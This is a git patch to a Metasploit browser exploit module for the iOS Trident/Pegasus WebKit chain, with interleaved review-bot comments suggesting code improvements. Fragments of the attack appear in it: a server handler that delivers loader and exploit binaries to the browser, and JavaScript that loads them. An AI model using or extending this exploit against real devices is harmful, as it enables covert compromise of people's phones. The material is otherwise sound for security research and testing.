From 50300426cae94de1e941c5a2a76be454fc1af4c6 Mon Sep 17 00:00:00 2001
From: Tim W
Date: Thu, 3 May 2018 18:21:07 +0800
Subject: [PATCH] fix feedback from code review
---
 .../apple_ios/browser/webkit_trident.rb | 21 +++++++++----------
 1 file changed, 10 insertions(+), 11 deletions(-)
diff --git a/modules/exploits/apple_ios/browser/webkit_trident.rb b/modules/exploits/apple_ios/browser/webkit_trident.rb
index 6e666c3f99..f18e0c519b 100644
--- a/modules/exploits/apple_ios/browser/webkit_trident.rb
+++ b/modules/exploits/apple_ios/browser/webkit_trident.rb
@@ -1,10 +1,10 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = ManualRanking
 include Msf::Exploit::Remote::HttpServer::HTML
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
 },
 'License' => MSF_LICENSE,
- 'Author' => [
+ 'Author' => [
 'qwertyoruiop', # jbme.qwertyoruiop.com
 'siguza', # PhoenixNonce
 'tihmstar', # PhoenixNonce
@@ -25,10 +25,13 @@ class MetasploitModule < Msf::Exploit::Remote
 ['CVE', '2016-4655'],
 ['CVE', '2016-4656'],
 ['CVE', '2016-4657'],
+ ['BID', '92651'],
+ ['BID', '92652'],
+ ['BID', '92653'],
 ['URL', 'https://blog.lookout.com/trident-pegasus'],
 ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],
 ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],
- ['URL', 'https://github.com/Siguza/PhoenixNonce.git'],
+ ['URL', 'https://github.com/Siguza/PhoenixNonce'],
 ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
 ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
 ],
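Review bot: In the first hunk, `Rank = ManualRanking` replaces `ExcellentRanking` with no comment recording why, although the rank is what the framework's automated selection filters on. A short comment above the constant would keep the rationale next to the code, for example `# ManualRanking: memory-corruption exploit; can crash the target browser, so it must be selected explicitly`. That wording is inferred from the description's "UAF vulnerability" text, so the author should replace it with the actual basis for the downgrade.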
@@ -46,13 +49,13 @@ class MetasploitModule < Msf::Exploit::Remote
 def on_request_uri(cli, request)
 print_status("Request from #{request['User-Agent']}")
- if request.uri =~ /\/loader$/
+ if request.uri =~ %r{/loader$}
 print_good("Target is vulnerable.")
 local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
 loader_data = File.read(local_file, {:mode => 'rb'})
 send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
 return
- elsif request.uri =~ /\/exploit$/
+ elsif request.uri =~ %r{/exploit$}
 local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
 loader_data = File.read(local_file, {:mode => 'rb'})
 send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
@@ -66,11 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
 function load_binary_resource(url) {
 var req = new XMLHttpRequest();
 req.open('GET', url, false);
- req.overrideMimeType('text\/plain; charset=x-user-defined');
+ req.overrideMimeType('text/plain; charset=x-user-defined');
 req.send(null);
- if (req.status != 200) {
- document.write("fail downloading loader");
- };
 return req.responseText;
 }
 var mem0 = 0;
@@ -189,7 +189,6 @@ class MetasploitModule < Msf::Exploit::Remote
 }
 }
 fc();
- alert(2);
 }
 function go_() {
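Review bot: In the `on_request_uri` hunk, `print_good("Target is vulnerable.")` runs for any request whose path matches `%r{/loader$}`, and the hunk shows no other check, so a scanner or crawler that fetches that URL would be logged as a vulnerable target. A neutral message such as `print_status("Sending loader")` would keep assessment logs accurate. The rewritten patterns also keep the `$` anchor, which in Ruby matches before a newline as well as at the end of the string; `\z` states the intended anchor, as in `%r{/loader\z}` and `%r{/exploit\z}`. The method's body continues outside the hunk.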